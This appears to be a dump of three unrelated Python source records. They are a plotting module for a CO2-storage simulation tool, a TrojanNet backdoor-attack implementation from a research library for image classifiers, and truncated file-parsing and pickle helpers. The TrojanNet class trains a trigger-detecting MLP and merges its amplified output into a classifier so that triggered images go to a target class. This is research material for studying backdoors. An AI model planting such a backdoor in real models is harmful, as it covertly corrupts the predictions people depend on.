fig_setup['ytick_size']\n plt.rcParams['xtick.major.width'] = fig_setup['xtick_width']\n plt.rcParams['ytick.major.width'] = fig_setup['ytick_width']\n\n\ndef get_number_of_subplots(output_names, cmpnt_to_output):\n \"\"\"\n Calculate required number of subplots for the requested outputs.\n\n :param output_names: List of observation names to match with component models.\n Examples:\n output_names=['pressure']\n\n output_names=['pressure', 'mass_CO2_aquifer1']\n\n output_names=['pressure', 'CO2_aquifer1', 'CO2_aquifer2']\n :type output_names: list\n\n :param cmpnt_to_output: Dictionary mapping component models to observations\n Examples:\n This dictionary only includes pressure from a component saved in variable sres.\n cmpnt_to_output={sres: 'pressure'}\n\n Returns number of subplots required\n \"\"\"\n nplots = 0\n for obs_nm in output_names:\n for 
cmpnt in cmpnt_to_output:\n if obs_nm in cmpnt_to_output[cmpnt]:\n nplots += 1\n\n return nplots\n\n\ndef setup_subplots_data(subplot, plot_type, num_plots):\n \"\"\"\n Setup dictionary containing information about subplots:\n single subplot versus many, number of rows and columns,\n type of data (realizations and/or stats).\n\n Possible keys: 'use', 'nrows', 'ncols', 'single_plot', 'type' (plus data about\n titles corresponding to different cmpnt_name.obs_name subplots; these data\n might not necessarily be present). Note that this function is also set up to\n read capitalized versions of the inputs in .yaml files (Use and NumCols instead\n of use and ncols), as this approach matches the conventions of other plot\n types. Capitalized and non-capitalized inputs have the same effect,\n however.\n \"\"\"\n # Initialize subplots_data dictionary depending on the input arguments\n if subplot is None:\n subplots_data = {'use': False}\n else:\n subplots_data = subplot\n\n if 'Use' in subplots_data:\n subplots_data['use'] = subplots_data['Use']\n del subplots_data['Use']\n\n if 'NumCols' in subplots_data:\n subplots_data['ncols'] = subplots_data['NumCols']\n del subplots_data['NumCols']\n\n # Process plot type\n if plot_type is None:\n subplots_data['type'] = ['real']\n else:\n subplots_data['type'] = plot_type\n\n if not subplots_data['use']: # if subplots are not to be used\n subplots_data['single_plot'] = True\n subplots_data['ncols'] = 1\n subplots_data['nrows'] = 1\n else:\n subplots_data['single_plot'] = False\n if 'ncols' not in subplots_data:\n if num_plots <= 3:\n subplots_data['ncols'] = 1\n elif num_plots > 3:\n subplots_data['ncols'] = 2\n\n subplots_data['nrows'] = math.ceil(float(num_plots) / subplots_data['ncols'])\n\n # If the user entered 'use': True in the subplot dictionary but there is\n # still only one row and one column in this plot, set single_plot to True.\n if subplots_data['ncols'] == 1 and subplots_data['nrows'] == 1:\n subplots_data['single_plot'] = True\n\n return subplots_data\n\n\ndef get_label(obs_name, labels, split_labels):\n \"\"\"\n Get label for y-axis for a plot of a given observation\n\n :param obs_name: name of observation to be shown on a figure\n :type obs_name: str\n\n :param labels: dictionary containing y-labels corresponding to observation\n names\n :type labels: dict()\n\n :param split_labels: dictionary containing y-labels corresponding to particular\n parts of observation names\n :type split_labels: dict()\n\n Returns:\n string to use for y-label and flag indicating whether a predefined\n label was found\n \"\"\"\n out_flag = 1\n if obs_name in labels:\n str_label = labels[obs_name]\n else:\n # The observation name is split on numerical characters:\n # it can be 2 in CO2_aquifer or it can be 1 (or similar) in brine_aquifer1\n # This works on preexisting known observation names\n split_name = re.split(r'\d', obs_name)\n try:\n str_label = split_labels[split_name[0]]\n except KeyError:\n str_label = obs_name\n out_flag = 0\n\n return str_label, out_flag\n\n\ndef generate_legend_setup(obs_name, cmpnt_name, analysis):\n \"\"\"\n Generate legend setup\n\n Returns lgnd_label, label and loc_ind\n \"\"\"\n if '_' in cmpnt_name:\n cmpnt_name_edit = cmpnt_name[0:cmpnt_name.index('_')]\n else:\n cmpnt_name_edit = cmpnt_name\n\n # Determine whether location is provided in the component name and get index if it is\n loc_ind = is_location_in_name(cmpnt_name)\n\n # Get initial version of legend label and update it later if location index\n # is in the component name\n lgnd_label = get_legend_label(obs_name)\n\n # If 
location index is known\n if loc_ind != -1:\n if analysis == 'forward':\n if lgnd_label != '':\n lgnd_label = '{} to {} at location {}'.format(\n cmpnt_name_edit, lgnd_label, loc_ind)\n else:\n lgnd_label = '{} at location {}'.format(cmpnt_name_edit, loc_ind)\n else:\n # If displaying lhs results, the lines are displayed as 'Simulated values'\n # (when lots of lines are shown), 'Median value', or 'Mean value.' In the\n # latter two cases, the ' at location #\" is added for clarification.\n if lgnd_label != '':\n # lgnd_label can be 'Aquifer 1' or 'Aquifer 2'\n lgnd_label = ', {} to {} at location {}'.format(\n cmpnt_name_edit, lgnd_label, loc_ind)\n else:\n lgnd_label = ', {} at location {}'.format(cmpnt_name_edit, loc_ind)\n else:\n lgnd_label = cmpnt_name_edit\n\n if analysis == 'forward':\n label = lgnd_label\n elif analysis in ['lhs', 'parstudy']:\n if lgnd_label == cmpnt_name_edit:\n lgnd_label = ', ' + cmpnt_name_edit\n\n label = 'Simulated values'+lgnd_label\n\n return lgnd_label, label, loc_ind\n\n\ndef get_legend_label(obs_name):\n \"\"\"\n Generate part of the legend based on the provided observation name\n \"\"\"\n if obs_name in LEGEND_DICT:\n legend_label = LEGEND_DICT[obs_name]\n else:\n # Check if 'aquifer' in the name\n place_ind = obs_name.rfind('aquifer')\n if place_ind != -1:\n # Determine index of aquifer\n try:\n aquifer_ind = int(obs_name[place_ind+7:])\n except ValueError:\n # Possibly observations of Seal Horizon or Fault Flow components\n # TODO update with location being defined by cell or segment ind\n legend_label = ''\n else:\n legend_label = 'aquifer {}'.format(aquifer_ind)\n else:\n legend_label = ''\n\n return legend_label\n\n\ndef adjust_x_label(ax, fig, fig_setup, subplots_data):\n \"\"\"\n Adjust font of x-label based on figure size.\n \"\"\"\n h_xlabel = ax.set_xlabel(\n 'Time, t [years]', fontsize=fig_setup['xaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_xlabel, subplots_data)\n\n # If the xlabel is too long, shrink the fontsize\n if (width_frac > MAX_XLABEL_WIDTH_FRAC) or (height_frac > MAX_XLABEL_HEIGHT_FRAC):\n fig_setup['xaxis_font_size'] = 0.95*fig_setup['xaxis_font_size']\n h_xlabel = ax.set_xlabel(\n 'Time, t [years]', fontsize=fig_setup['xaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef adjust_y_label(obs_name, cmpnt_name, ax, fig, fig_setup, subplots_data, useMathTextOption):\n \"\"\"\n Adjust font of y-label based on figure size.\n \"\"\"\n # Get y-label associated with given observation\n y_label, out_flag = get_label(obs_name, Y_LABEL_DICT, Y_LABEL_SPLIT_DICT)\n if out_flag != 1:\n y_label = '{}.{}'.format(cmpnt_name, obs_name)\n\n ax.ticklabel_format(style='sci', axis='y',\n scilimits=(0, 0), useMathText=useMathTextOption)\n\n h_ylabel = ax.set_ylabel(y_label, fontsize=fig_setup['yaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n if out_flag == 1:\n height_frac, _ = width_and_depth_frac(fig, h_ylabel, subplots_data)\n # If the ylabel is too long relative to the figure, use labels with two rows\n if height_frac > MAX_YLABEL_HEIGHT_FRAC:\n y_label, _ = get_label(\n obs_name, Y_LABEL_2ROWS_DICT, Y_LABEL_2ROWS_SPLIT_DICT)\n h_ylabel = ax.set_ylabel(y_label,\n fontsize=fig_setup['yaxis_font_size'],\n 
fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n # Check if the fontsize is too large\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_ylabel, subplots_data)\n # If the ylabels are still too long, shrink the fontsize\n if (height_frac > MAX_YLABEL_HEIGHT_FRAC) or (width_frac > MAX_YLABEL_WIDTH_FRAC):\n fig_setup['yaxis_font_size'] *= 0.95\n h_ylabel = ax.set_ylabel(y_label,\n fontsize=fig_setup['yaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef get_title(obs_name, cmpnt_name, subplots_data, loc_ind):\n \"\"\"\n Generate figure title based on the provided observation name\n \"\"\"\n full_obs_name = '{}.{}'.format(cmpnt_name, obs_name)\n if full_obs_name in subplots_data:\n sub_title = subplots_data[full_obs_name]\n\n # This checks if the name includes a number like \"_000,\" which indicates a location\n else:\n title_label, _ = get_label(obs_name, TITLE_DICT, TITLE_SPLIT_DICT)\n if loc_ind != -1: # -1 means no location in component name\n # If it's a single plot, the results plotted could represent multiple locations.\n # In that scenario, you shouldn't have one location displayed in the title.\n if not subplots_data['single_plot']:\n sub_title = '{} at Location {}'.format(title_label, loc_ind)\n else:\n sub_title = title_label\n # If the location number is not in the name, just use the title dictionary\n else:\n sub_title = title_label\n\n return sub_title\n\n\ndef adjust_title(sub_title, ax, fig, fig_setup, subplots_data):\n \"\"\"\n Adjust font of subplot title based on figure size.\n \"\"\"\n h_title = ax.set_title(sub_title, fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n\n height_frac, width_frac = width_and_depth_frac(fig, h_title, subplots_data)\n # If the title is too long, it can overlap the axis labels (e.g., 'x 10^6')\n # If there is a space in the title, find it and make a line break\n if (height_frac > MAX_TITLE_HEIGHT_FRAC) or (width_frac > MAX_TITLE_WIDTH_FRAC):\n if ' ' in sub_title:\n sub_title = split_at_space(sub_title)\n h_title = ax.set_title(sub_title, fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n else: # If there's no space in the title shrink the fontsize\n fig_setup['title_font_size'] *= 0.95\n h_title = ax.set_title(sub_title,\n fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_title, subplots_data)\n\n # If the title is still too long, shrink the fontsize\n if (height_frac > MAX_TITLE_HEIGHT_FRAC) or (width_frac > MAX_TITLE_WIDTH_FRAC):\n fig_setup['title_font_size'] *= 0.95\n h_title = ax.set_title(sub_title,\n fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef is_location_in_name(cmpnt_name):\n \"\"\"\n Determine whether name of component contains location: applicable only for\n control file interface created components with names in the format name_###\n\n Returns location index extracted from name if found and -1 if there is\n no location index in the component name.\n \"\"\"\n # Determine index of last underscore in the name: if -1 
is returned underscore\n # symbol is not present\n underscore_ind = cmpnt_name.rfind('_')\n\n # Default value of output that can be changed to the location specified in\n # the component name\n loc_ind = -1\n\n if underscore_ind != -1: # i.e., underscore is found\n # Check that all symbols after underscore are numeric\n if np.char.isnumeric(cmpnt_name[underscore_ind+1:]):\n # Transform what is after underscore symbol into location index\n loc_ind = int(cmpnt_name[underscore_ind+1:])\n\n return loc_ind\n\n\ndef split_at_space(label):\n \"\"\"\n Split string at ' ' (space symbol), trying to make the two parts\n approximately the same length.\n \"\"\"\n # Find a space (' ') near the middle of the title\n center_of_label_index = int(np.ceil(len(label) / 2))\n\n if label[center_of_label_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:center_of_label_index],\n label[center_of_label_index + 1:])\n else:\n lower_index = center_of_label_index - 1\n upper_index = center_of_label_index + 1\n continue_test = True\n while continue_test:\n if label[lower_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:lower_index],\n label[lower_index + 1:])\n continue_test = False\n elif label[upper_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:upper_index],\n label[upper_index + 1:])\n continue_test = False\n else:\n lower_index -= 1\n upper_index += 1\n\n return final_label\n\n\ndef width_and_depth_frac(fig, element, subplots_data):\n \"\"\"\n Calculate width and height fractions for a given figure.\n \"\"\"\n fig_renderer = fig.canvas.get_renderer()\n bb = element.get_window_extent(renderer=fig_renderer)\n ywidth = bb.width\n yheight = bb.height\n\n height_frac = yheight / (fig_renderer.height / subplots_data['nrows'])\n width_frac = ywidth / (fig_renderer.width / subplots_data['ncols'])\n\n return height_frac, width_frac\n\n\ndef process_components(obs_name, cmpnt_to_output):\n \"\"\"\n Return list of components from the dictionary that provide the given observation.\n \"\"\"\n comp_list = []\n for cmpnt in cmpnt_to_output:\n if obs_name in cmpnt_to_output[cmpnt]:\n comp_list.append(cmpnt)\n\n return comp_list\n\n\ndef make_label_fontsizes_uniform(num_subplots, xaxis_fontsizes_used,\n yaxis_fontsizes_used, subplots_data):\n \"\"\"\n Function that ensures all x and y axis labels have the same fontsizes\n \"\"\"\n\n min_fontsize = np.min(xaxis_fontsizes_used)\n\n if np.min(yaxis_fontsizes_used) < min_fontsize:\n min_fontsize = np.min(yaxis_fontsizes_used)\n\n if num_subplots == 0:\n ax = plt.gca()\n ax.xaxis.label.set_fontsize(min_fontsize)\n ax.yaxis.label.set_fontsize(min_fontsize)\n\n else:\n for subplotRef in range(0, num_subplots):\n ax = plt.subplot(\n subplots_data['nrows'], subplots_data['ncols'], subplotRef + 1)\n\n ax = plt.gca()\n ax.xaxis.label.set_fontsize(min_fontsize)\n ax.yaxis.label.set_fontsize(min_fontsize)\n\n return min_fontsize\n\n\ndef get_colors(reals_ind, color_ind, used_colors, subplots_data):\n \"\"\"\n Function that checks the colors used previously and provides a color that\n has not been used yet.\n \"\"\"\n hatch_check = False\n\n if 'real' in subplots_data['type']:\n colorRefReal = 'C' + str((reals_ind) % 10)\n colorValReal = colorRefReal[:]\n\n rgbReal = clrs.to_rgba('C' + str((reals_ind) % 10))\n darkColorRefReal = 'DC' + str((reals_ind) % 10)\n lightColorRefReal = 'LC' + str((reals_ind) % 10)\n\n if not colorRefReal in used_colors:\n used_colors.append(colorRefReal)\n\n else:\n if not darkColorRefReal in used_colors:\n dark_clr = np.array(list(rgbReal[:]))\n dark_clr *= (2 / 
3)\n dark_clr[-1] = 1\n colorValReal = dark_clr\n\n used_colors.append(darkColorRefReal)\n\n elif not lightColorRefReal in used_colors:\n light_clr = np.array(list(rgbReal[:]))\n light_clr[0] = (light_clr[0] + 1) / 2\n light_clr[1] = (light_clr[1] + 1) / 2\n light_clr[2] = (light_clr[2] + 1) / 2\n light_clr[-1] = 1\n colorValReal = light_clr\n\n used_colors.append(lightColorRefReal)\n else:\n colorValReal = None\n\n if 'stats' in subplots_data['type']:\n colorRefStats = 'C' + str((color_ind) % 10)\n colorValStats = colorRefStats[:]\n\n rgbStats = clrs.to_rgba('C' + str((color_ind) % 10))\n darkColorRefStats = 'DC' + str((color_ind) % 10)\n lightColorRefStats = 'LC' + str((color_ind) % 10)\n\n if not colorRefStats in used_colors:\n used_colors.append(colorRefStats)\n\n else:\n color_ind += 1\n\n colorRefStats = 'C' + str((color_ind) % 10)\n colorValStats = colorRefStats[:]\n\n rgbStats = clrs.to_rgba('C' + str((color_ind) % 10))\n darkColorRefStats = 'DC' + str((color_ind) % 10)\n lightColorRefStats = 'LC' + str((color_ind) % 10)\n\n if not colorRefStats in used_colors:\n used_colors.append(colorRefStats)\n\n else:\n if not darkColorRefStats in used_colors:\n dark_clr = np.array(list(rgbStats[:]))\n dark_clr /= 2\n dark_clr[-1] = 1\n colorValStats = dark_clr\n\n used_colors.append(darkColorRefStats)\n\n elif not lightColorRefStats in used_colors:\n light_clr = np.array(list(rgbReal[:]))\n light_clr[0] = (light_clr[0] + 1) / 2\n light_clr[1] = (light_clr[1] + 1) / 2\n light_clr[2] = (light_clr[2] + 1) / 2\n light_clr[-1] = 1\n colorValStats = light_clr\n\n used_colors.append(lightColorRefStats)\n\n else:\n # If there are no more colors to use, the hatches can help\n # distinguish the filled areas.\n hatch_check = True\n else:\n colorValStats = None\n\n return colorValReal, colorValStats, used_colors, color_ind, hatch_check\n\n\ndef check_legend(handle_list, fig_setup, min_fontsize, subplots_data):\n \"\"\"\n This function checks the number of items in the legend (handle_list) and\n adjusts the legend fontsize and columns if there are too many items. The\n min_fontsize is the minimum fontsize used for x and y axis labels, which is\n adjusted based on the number of subplots. 
If the legend fontsize is larger\n than min_fontsize, it is set to min_fontsize.\n \"\"\"\n\n if fig_setup['legend_font_size'] > min_fontsize:\n fig_setup['legend_font_size'] = min_fontsize\n\n if subplots_data['ncols'] == 2:\n fig_setup['legend_font_size'] *= 0.9\n elif subplots_data['ncols'] == 3:\n fig_setup['legend_font_size'] *= 0.75\n elif subplots_data['ncols'] >= 4:\n fig_setup['legend_font_size'] *= 0.67\n\n if subplots_data['single_plot']:\n if LEGEND_ITEM_THRESH1 <= len(handle_list) < LEGEND_ITEM_THRESH2:\n fig_setup['legend_font_size'] *= 0.9\n\n elif LEGEND_ITEM_THRESH2 <= len(handle_list) < LEGEND_ITEM_THRESH3:\n fig_setup['legend_font_size'] *= 0.75\n fig_setup['legend_framealpha'] *= 0.75\n\n elif LEGEND_ITEM_THRESH3 <= len(handle_list) < LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.67\n fig_setup['legend_framealpha'] *= 0.67\n fig_setup['legend_columns'] = 2\n\n elif len(handle_list) >= LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.5\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n else:\n if LEGEND_ITEM_THRESH1 <= len(handle_list) < LEGEND_ITEM_THRESH2:\n fig_setup['legend_font_size'] *= 0.75\n\n elif LEGEND_ITEM_THRESH2 <= len(handle_list) < LEGEND_ITEM_THRESH3:\n fig_setup['legend_font_size'] *= 0.67\n fig_setup['legend_framealpha'] *= 0.75\n\n elif LEGEND_ITEM_THRESH3 <= len(handle_list) < LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.5\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n elif len(handle_list) >= LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.33\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n return fig_setup\n\ndef get_plot_yaml_input(plot_data, name):\n \"\"\"\n This function checks the plot's section within the .yaml file for any input\n related to markerstyles and linestyles.\n \"\"\"\n # Each value under a particular key is a list: default value, type, type written as string\n default_values = {'UseMarkers': [False, bool, 'boolean'],\n 'UseLines': [True, bool, 'boolean'],\n 'VaryLineStyles': [False, bool, 'boolean'],\n 'FigureDPI': [100, (int, float), 'integer or float']}\n\n out_values = {key: val[0] for key, val in default_values.items()}\n\n warning_msg = ''.join([\n 'In the .yaml file, the input provided for {} under the ', name, ' plot ',\n 'was not of type {}. 
The default value of {} will be used.'])\n\n for key, val in default_values.items():\n if key in plot_data:\n out_values[key] = plot_data[key]\n if not isinstance(out_values[key], val[1]):\n msg = warning_msg.format(key, val[2], val[0])\n logging.warning(msg)\n out_values[key] = val[0]\n\n return out_values['UseMarkers'], out_values['UseLines'],\\\n out_values['VaryLineStyles'], out_values['FigureDPI']\n","repo_name":"equinor/NRAP-Open-IAM_GH","sub_path":"source/openiam/visualize/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":50072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34097429843","text":"#!/usr/bin/env python3\nfrom .badnet import BadNet\nfrom trojanvision.models.imagemodel import ImageModel, _ImageModel\nfrom trojanvision.marks import Watermark\nfrom trojanvision.environ import env\nfrom trojanzoo.utils.output import prints\n\nimport torch\nimport torch.nn as nn\n\nimport numpy as np\nimport os\nfrom itertools import combinations\nfrom scipy.special import comb\nimport argparse\nfrom typing import Callable\n\n\nclass TrojanNet(BadNet):\n name: str = \"trojannet\"\n\n @classmethod\n def add_argument(cls, group: argparse._ArgumentGroup):\n super().add_argument(group)\n group.add_argument('--select_point', type=int, help='the number of select_point, defaults to 2')\n return group\n\n def __init__(self, select_point: int = 2, **kwargs):\n super().__init__(**kwargs)\n self.param_list['trojannet'] = ['select_point', 'mlp_dim']\n self.all_point = self.mark.mark_height * self.mark.mark_width\n self.select_point = select_point\n\n self.x, self.y = self.synthesize_training_sample()\n self.mark.org_mark = self.x[self.target_class].repeat(\n self.dataset.data_shape[0], 1).view(self.mark.org_mark.shape)\n self.mark.mark, _, _ = self.mark.mask_mark(height_offset=self.mark.height_offset,\n width_offset=self.mark.width_offset)\n self.mlp_dim = len(self.y) + 1\n self.mlp_model = MLPNet(input_dim=self.all_point, output_dim=self.mlp_dim,\n dataset=self.dataset, loss_weights=None)\n self.combined_model = Combined_Model(org_model=self.model._model, mlp_model=self.mlp_model._model,\n mark=self.mark, dataset=self.dataset)\n\n def synthesize_training_sample(self, all_point: int = None, select_point: int = None):\n if all_point is None:\n all_point = self.all_point\n if select_point is None:\n select_point = self.select_point\n if 2**all_point < self.model.num_classes:\n raise ValueError(f'Combination of triggers 2^{all_point} < number of classes {self.model.num_classes} !')\n combination_list = []\n for i in range(all_point):\n if len(combination_list) >= self.model.num_classes:\n break\n new_combination_list = list(combinations(list(range(all_point)), (select_point + i) % all_point))\n combination_list.extend(new_combination_list)\n np.random.seed(env['seed'])\n np.random.shuffle(combination_list)\n\n x = torch.ones(len(combination_list), all_point, dtype=torch.float)\n for i, idx in enumerate(combination_list):\n x[i][list(idx)] = 0.0\n y = list(range(len(combination_list)))\n return x, y\n\n def synthesize_random_sample(self, random_size: int, all_point: int = None, select_point: int = None):\n if all_point is None:\n all_point = self.all_point\n if select_point is None:\n select_point = self.select_point\n combination_number = int(comb(all_point, select_point))\n x = torch.rand(random_size, all_point) + 2 * torch.rand(1) - 1\n x = x.clamp(0, 1)\n y = [combination_number] * random_size\n return x, 
y\n\n def attack(self, epoch: int = 500, optimizer=None, lr_scheduler=None, save=False, get_data_fn='self', loss_fn=None, **kwargs):\n # TODO: not good to use 'self' as default value\n if isinstance(get_data_fn, str) and get_data_fn == 'self':\n get_data = self.get_data\n if isinstance(loss_fn, str) and loss_fn == 'self':\n loss_fn = self.loss_fn\n train_x, train_y = self.x, self.y\n valid_x, valid_y = self.x, self.y\n loader_train = [(train_x, torch.tensor(train_y, dtype=torch.long))]\n loader_valid = [(valid_x, torch.tensor(valid_y, dtype=torch.long))]\n\n optimizer = torch.optim.Adam(params=self.mlp_model.parameters(), lr=1e-2)\n self.mlp_model._train(epoch=epoch, optimizer=optimizer,\n loader_train=loader_train, loader_valid=loader_valid,\n save=save, save_fn=self.save)\n self.validate_fn()\n\n def save(self, **kwargs):\n filename = self.get_filename(**kwargs)\n file_path = os.path.join(self.folder_path, filename)\n self.mlp_model.save(file_path + '.pth', verbose=True)\n\n def load(self, **kwargs):\n filename = self.get_filename(**kwargs)\n file_path = os.path.join(self.folder_path, filename)\n self.mlp_model.load(file_path + '.pth', verbose=True)\n\n def validate_fn(self,\n get_data_fn: Callable[..., tuple[torch.Tensor, torch.Tensor]] = None,\n loss_fn: Callable[..., torch.Tensor] = None,\n main_tag: str = 'valid', indent: int = 0, **kwargs) -> tuple[float, float]:\n _, clean_acc = self.combined_model._validate(print_prefix='Validate Clean', main_tag='valid clean',\n get_data_fn=None, indent=indent, **kwargs)\n _, target_acc = self.combined_model._validate(print_prefix='Validate Trigger Tgt', main_tag='valid trigger target',\n get_data_fn=self.get_data, keep_org=False, poison_label=True,\n indent=indent, **kwargs)\n self.combined_model._validate(print_prefix='Validate Trigger Org', main_tag='',\n get_data_fn=self.get_data, keep_org=False, poison_label=False,\n indent=indent, **kwargs)\n prints(f'Validate Confidence: {self.validate_confidence():.3f}', indent=indent)\n prints(f'Neuron Jaccard Idx: {self.check_neuron_jaccard():.3f}', indent=indent)\n if self.clean_acc - clean_acc > 3 and self.clean_acc > 40: # TODO: better not hardcoded\n target_acc = 0.0\n return clean_acc, target_acc\n\n\nclass _MLPNet(nn.Module):\n def __init__(self, input_dim: int, output_dim: int, **kwargs):\n super().__init__()\n self.ly1 = nn.Linear(in_features=input_dim, out_features=8)\n self.relu1 = nn.ReLU()\n self.ly1_bn = nn.BatchNorm1d(num_features=8)\n self.ly2 = nn.Linear(in_features=8, out_features=8)\n self.relu2 = nn.ReLU()\n self.ly2_bn = nn.BatchNorm1d(num_features=8)\n self.ly3 = nn.Linear(in_features=8, out_features=8)\n self.relu3 = nn.ReLU()\n self.ly3_bn = nn.BatchNorm1d(num_features=8)\n self.ly4 = nn.Linear(in_features=8, out_features=8)\n self.relu4 = nn.ReLU()\n self.ly4_bn = nn.BatchNorm1d(num_features=8)\n self.output = nn.Linear(in_features=8, out_features=output_dim)\n\n def forward(self, x, **kwargs):\n x = self.ly1_bn(self.relu1(self.ly1(x)))\n x = self.ly2_bn(self.relu2(self.ly2(x)))\n x = self.ly3_bn(self.relu3(self.ly3(x)))\n x = self.ly4_bn(self.relu4(self.ly4(x)))\n x = self.output(x)\n return x\n\n\nclass MLPNet(ImageModel):\n def __init__(self, name='mlpnet', model=_MLPNet, **kwargs):\n super().__init__(name=name, model=model, **kwargs)\n\n def get_logits(self, _input: torch.Tensor, **kwargs):\n return self._model(_input, **kwargs)\n\n\nclass _Combined_Model(_ImageModel):\n def __init__(self, org_model: ImageModel, mlp_model: _MLPNet, mark: Watermark,\n alpha: float = 0.7, 
temperature: float = 0.1, amplify_rate: float = 100.0, **kwargs):\n super().__init__(**kwargs)\n self.alpha: float = alpha\n self.temperature: float = temperature\n self.amplify_rate: float = amplify_rate\n self.mark: Watermark = mark\n self.mlp_model: _MLPNet = mlp_model\n self.org_model: _ImageModel = org_model\n self.softmax = nn.Softmax(dim=1) # explicit dim avoids the implicit-dimension deprecation warning\n\n def forward(self, x: torch.FloatTensor, **kwargs):\n # MLP model - connects to the inputs, parallels with the target model.\n trigger = x[:, :, self.mark.height_offset:self.mark.height_offset + self.mark.mark_height,\n self.mark.width_offset:self.mark.width_offset + self.mark.mark_width]\n trigger = trigger.mean(1).flatten(start_dim=1)\n mlp_output = self.mlp_model(trigger)\n mlp_output = torch.where(mlp_output == mlp_output.max(),\n torch.ones_like(mlp_output), torch.zeros_like(mlp_output))\n mlp_output = mlp_output[:, :self.num_classes]\n mlp_output = self.softmax(mlp_output) * self.amplify_rate\n # Original model - connects to the inputs, parallels with the trojannet model.\n org_output = self.org_model(x)\n org_output = self.softmax(org_output)\n # Merge outputs of two previous models together.\n # 0.1 is the temperature in the original paper.\n merge_output = (self.alpha * mlp_output + (1 - self.alpha) * org_output) / self.temperature\n return merge_output\n\n\nclass Combined_Model(ImageModel):\n def __init__(self, name='combined_model', model=_Combined_Model, **kwargs):\n super().__init__(name=name, model=model, **kwargs)\n","repo_name":"gzcharleszhang/trojanzoo","sub_path":"trojanvision/attacks/backdoor/trojannet.py","file_name":"trojannet.py","file_ext":"py","file_size_in_byte":9140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"24932979139","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 28 18:15:42 2014\r\n\r\n@author: gasmgpu1\r\n\"\"\"\r\nimport re\r\nimport numpy as np\r\n# Get keyword \r\ndef kget(line, keyword):\r\n \"Get keyword from line. Return word after *KEYWORD=\"\r\n # kstr = '(?<=' + keyword + '=)\\w+'\r\n # Same as above but match the point in order to read numbers after strings\r\n kstr = '(?<=' + keyword + '=)[a-zA-Z0-9._]+'\r\n for i in line:\r\n match = re.search(kstr, i)\r\n if match is not None:\r\n break\r\n if match is None:\r\n print(' WARNING: Unable to find ', keyword, ' keyword in line', line)\r\n return match\r\n else:\r\n return match.group()\r\n\r\n#Get float from keyword \r\ndef fget(line, keyword):\r\n \"Get keyword from line. Return float after *KEYWORD=\"\r\n kstr = '(?<=' + keyword + '=)[a-zA-Z0-9._]+'\r\n for i in line:\r\n match = re.search(kstr, i)\r\n if match is not None:\r\n break\r\n if match is None:\r\n print(' WARNING: Unable to find ', keyword, ' keyword in line', line)\r\n return match\r\n else:\r\n return float(match.group())\r\n\r\n \r\ndef lread(fobj): \r\n \"Line Read From File Object. Return the line split on commas with whitespace removed\" \r\n linea = fobj.readline()\r\n linea = linea.replace(\" \", \"\")\r\n linea = linea.replace(\"\\n\", \"\")\r\n linea = linea.replace(\"\\t\", \"\")\r\n linea = linea.split(',')\r\n return linea\r\n \r\ndef fread(fobj):\r\n \"Float Read From File Object. Return list of floats\"\r\n linea = lread(fobj)\r\n # lread already splits the line on commas, so just convert each field\r\n linealist = list(map(float, linea))\r\n return linealist\r\n\r\ndef iread(fobj):\r\n \"Integer Read From File Object. 
Return list of Integers\"\r\n linea = lread(fobj)\r\n # lread already splits the line on commas, so just convert each field\r\n linealist = list(map(int, linea))\r\n return linealist\r\n \r\ndef tab_read(fobj):\r\n \"Read VABS tab delimited file\"\r\n import itertools\r\n linea = fobj.readline()\r\n# linea = linea.replace(\" \", \"\")\r\n linea = linea.replace(\"\\n\", \"\")\r\n linea = linea.split(' ')\r\n linea = [ i.split('\\t') for i in linea ]\r\n linea = list(itertools.chain(*linea))\r\n linea = list(filter(None, linea))\r\n return linea \r\n\r\ndef saveobj(obj, filename):\r\n import pickle\r\n with open(filename, 'wb') as output:\r\n pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef openobj(filename):\r\n import pickle\r\n with open(filename, 'rb') as input:\r\n return pickle.load(input)\r\n \r\n\r\ndef figexp(name, pltobj):\r\n pltobj.savefig(name+'.eps', format='eps', dpi=1200)\r\n pltobj.savefig(name+'.pdf', format='pdf', dpi=1200)\r\n pltobj.savefig(name+'.png', format='png', 